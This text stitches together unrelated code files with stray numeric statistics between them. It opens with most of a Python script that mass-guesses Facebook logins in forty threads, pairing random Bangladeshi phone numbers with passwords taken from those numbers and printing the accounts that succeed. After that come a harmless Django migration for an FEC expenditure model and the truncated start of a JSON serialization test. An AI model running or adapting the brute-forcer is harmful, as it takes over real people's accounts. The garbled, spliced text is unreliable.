y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi7():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi8():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi9():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi10():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi11():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi12():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi13():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi14():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi15():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi16():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi17():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi18():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi19():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi20():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi21():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi22():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi23():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi24():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi25():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi26():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi27():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi28():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi29():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi30():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi31():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi32():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi33():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi34():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi35():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi36():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi37():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi38():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi39():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi40():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
#############################
t1=pool(target=hi1)
t2=pool(target=hi2)
t3=pool(target=hi3)
t4=pool(target=hi4)
t5=pool(target=hi5)
t6=pool(target=hi6)
t7=pool(target=hi7)
t8=pool(target=hi8)
t9=pool(target=hi9)
t10=pool(target=hi10)
t11=pool(target=hi11)
t12=pool(target=hi12)
t13=pool(target=hi13)
t14=pool(target=hi14)
t15=pool(target=hi15)
t16=pool(target=hi16)
t17=pool(target=hi17)
t18=pool(target=hi18)
t19=pool(target=hi19)
t20=pool(target=hi20)
t21=pool(target=hi21)
t22=pool(target=hi22)
t23=pool(target=hi23)
t24=pool(target=hi24)
t25=pool(target=hi25)
t26=pool(target=hi26)
t27=pool(target=hi27)
t28=pool(target=hi28)
t29=pool(target=hi29)
t30=pool(target=hi30)
t31=pool(target=hi31)
t32=pool(target=hi32)
t33=pool(target=hi33)
t34=pool(target=hi34)
t35=pool(target=hi35)
t36=pool(target=hi36)
t37=pool(target=hi37)
t38=pool(target=hi38)
t39=pool(target=hi39)
t40=pool(target=hi40)
###############
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t6.start()
t7.start()
t8.start()
t9.start()
t10.start()
t11.start()
t12.start()
t13.start()
t14.start()
t15.start()
t16.start()
t17.start()
t18.start()
t19.start()
t20.start()
t21.start()
t22.start()
t23.start()
t24.start()
t25.start()
t26.start()
t27.start()
t28.start()
t29.start()
t30.start()
t31.start()
t32.start()
t33.start()
t34.start()
t35.start()
t36.start()
t37.start()
t38.start()
t39.start()
t40.start()
| 29.277481
| 282
| 0.658003
| 3,845
| 27,433
| 4.784655
| 0.075423
| 0.021743
| 0.013046
| 0.023917
| 0.842257
| 0.839756
| 0.839756
| 0.835952
| 0.835952
| 0.835952
| 0
| 0.174749
| 0.122006
| 27,433
| 936
| 283
| 29.308761
| 0.562028
| 0.032917
| 0
| 0.679115
| 0
| 0.056708
| 0.483467
| 0.177271
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056708
| false
| 0.055325
| 0.011065
| 0
| 0.067773
| 0.085754
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d182e2f1208922373b737d8cf754956ba62861fa
| 5,266
|
py
|
Python
|
cycle_2018/migrations/0007_scheduleb.py
|
RobBickel/nyt-fec
|
802df867c3b31fff8e922be00bab6f40a5db2d00
|
[
"Apache-2.0"
] | 17
|
2018-03-27T15:09:58.000Z
|
2020-05-13T11:32:43.000Z
|
cycle_2018/migrations/0007_scheduleb.py
|
RobBickel/nyt-fec
|
802df867c3b31fff8e922be00bab6f40a5db2d00
|
[
"Apache-2.0"
] | 59
|
2018-03-21T17:08:15.000Z
|
2021-12-13T19:47:37.000Z
|
cycle_2018/migrations/0007_scheduleb.py
|
RobBickel/nyt-fec
|
802df867c3b31fff8e922be00bab6f40a5db2d00
|
[
"Apache-2.0"
] | 11
|
2018-09-11T23:18:32.000Z
|
2021-12-15T08:43:58.000Z
|
# Generated by Django 2.0.1 on 2018-02-16 22:22
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('cycle_2018', '0006_auto_20180216_2106'),
]
operations = [
migrations.CreateModel(
name='ScheduleB',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('active', models.BooleanField(default=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(auto_now=True)),
('form_type', models.CharField(blank=True, max_length=255, null=True)),
('filer_committee_id_number', models.CharField(blank=True, max_length=255, null=True)),
('filing_id', models.IntegerField(blank=True, null=True)),
('transaction_id', models.CharField(blank=True, max_length=255, null=True)),
('back_reference_tran_id_number', models.CharField(blank=True, max_length=255, null=True)),
('back_reference_sched_name', models.CharField(blank=True, max_length=255, null=True)),
('entity_type', models.CharField(blank=True, max_length=255, null=True)),
('payee_organization_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_last_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_first_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_middle_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_prefix', models.CharField(blank=True, max_length=255, null=True)),
('payee_suffix', models.CharField(blank=True, max_length=255, null=True)),
('payee_street_1', models.CharField(blank=True, max_length=255, null=True)),
('payee_street_2', models.CharField(blank=True, max_length=255, null=True)),
('payee_city', models.CharField(blank=True, max_length=255, null=True)),
('payee_state', models.CharField(blank=True, max_length=30, null=True)),
('payee_zip', models.CharField(blank=True, max_length=10, null=True)),
('election_code', models.CharField(blank=True, max_length=255, null=True)),
('election_other_description', models.CharField(blank=True, max_length=255, null=True)),
('expenditure_date', models.CharField(blank=True, max_length=255, null=True)),
('expenditure_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=12, null=True)),
('semi_annual_refunded_bundled_amt', models.DecimalField(blank=True, decimal_places=2, max_digits=12, null=True)),
('expenditure_purpose_descrip', models.CharField(blank=True, max_length=255, null=True)),
('category_code', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_committee_fec_id', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_committee_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_fec_id', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_last_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_first_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_middle_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_prefix', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_suffix', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_office', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_state', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_district', models.CharField(blank=True, max_length=255, null=True)),
('conduit_name', models.CharField(blank=True, max_length=255, null=True)),
('conduit_street_1', models.CharField(blank=True, max_length=255, null=True)),
('conduit_street_2', models.CharField(blank=True, max_length=255, null=True)),
('conduit_city', models.CharField(blank=True, max_length=255, null=True)),
('conduit_state', models.CharField(blank=True, max_length=255, null=True)),
('conduit_zip', models.CharField(blank=True, max_length=255, null=True)),
('memo_code', models.CharField(blank=True, max_length=255, null=True)),
('memo_text_description', models.CharField(blank=True, max_length=255, null=True)),
('reference_to_si_or_sl_system_code_that_identifies_the_account', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'abstract': False,
},
),
]
| 73.138889
| 139
| 0.646031
| 619
| 5,266
| 5.261712
| 0.189015
| 0.124348
| 0.257906
| 0.309487
| 0.778324
| 0.778324
| 0.778324
| 0.754682
| 0.754682
| 0.727663
| 0
| 0.04089
| 0.215154
| 5,266
| 71
| 140
| 74.169014
| 0.747157
| 0.008545
| 0
| 0
| 1
| 0
| 0.188542
| 0.117072
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030769
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d18dc137b20e6e118cba0556bb79383907ed97e3
| 69,012
|
py
|
Python
|
projects/Python/tests/test_serialization_json.py
|
kokizzu/FastBinaryEncoding
|
eec54ef2fb83de0bb24cc33a591f9896d360f23c
|
[
"MIT"
] | 563
|
2018-09-04T23:52:42.000Z
|
2022-03-24T01:35:50.000Z
|
projects/Python/tests/test_serialization_json.py
|
kokizzu/FastBinaryEncoding
|
eec54ef2fb83de0bb24cc33a591f9896d360f23c
|
[
"MIT"
] | 44
|
2018-12-04T11:13:34.000Z
|
2022-03-01T00:22:05.000Z
|
projects/Python/tests/test_serialization_json.py
|
kokizzu/FastBinaryEncoding
|
eec54ef2fb83de0bb24cc33a591f9896d360f23c
|
[
"MIT"
] | 69
|
2018-11-06T12:15:39.000Z
|
2022-02-10T13:51:01.000Z
|
import datetime
import decimal
import uuid
import proto
from proto import proto
from proto import test
from unittest import TestCase
class TestSerializationJson(TestCase):
def test_serialization_json_domain(self):
# Define a source JSON string
json = r'{"id":1,"name":"Test","state":6,"wallet":{"currency":"USD","amount":1000.0},"asset":{"currency":"EUR","amount":100.0},"orders":[{"id":1,"symbol":"EURUSD","side":0,"type":0,"price":1.23456,"volume":1000.0},{"id":2,"symbol":"EURUSD","side":1,"type":1,"price":1.0,"volume":100.0},{"id":3,"symbol":"EURUSD","side":0,"type":2,"price":1.5,"volume":10.0}]}'
# Create a new account from the source JSON string
account1 = proto.Account.from_json(json)
# Serialize the account to the JSON string
json = account1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the account from the JSON string
account2 = proto.Account.from_json(json)
self.assertEqual(account2.id, 1)
self.assertEqual(account2.name, "Test")
self.assertTrue(account2.state.has_flags(proto.State.good))
self.assertEqual(account2.wallet.currency, "USD")
self.assertEqual(account2.wallet.amount, 1000.0)
self.assertNotEqual(account2.asset, None)
self.assertEqual(account2.asset.currency, "EUR")
self.assertEqual(account2.asset.amount, 100.0)
self.assertEqual(len(account2.orders), 3)
self.assertEqual(account2.orders[0].id, 1)
self.assertEqual(account2.orders[0].symbol, "EURUSD")
self.assertEqual(account2.orders[0].side, proto.OrderSide.buy)
self.assertEqual(account2.orders[0].type, proto.OrderType.market)
self.assertEqual(account2.orders[0].price, 1.23456)
self.assertEqual(account2.orders[0].volume, 1000.0)
self.assertEqual(account2.orders[1].id, 2)
self.assertEqual(account2.orders[1].symbol, "EURUSD")
self.assertEqual(account2.orders[1].side, proto.OrderSide.sell)
self.assertEqual(account2.orders[1].type, proto.OrderType.limit)
self.assertEqual(account2.orders[1].price, 1.0)
self.assertEqual(account2.orders[1].volume, 100.0)
self.assertEqual(account2.orders[2].id, 3)
self.assertEqual(account2.orders[2].symbol, "EURUSD")
self.assertEqual(account2.orders[2].side, proto.OrderSide.buy)
self.assertEqual(account2.orders[2].type, proto.OrderType.stop)
self.assertEqual(account2.orders[2].price, 1.5)
self.assertEqual(account2.orders[2].volume, 10.0)
def test_serialization_json_struct_simple(self):
# Define a source JSON string
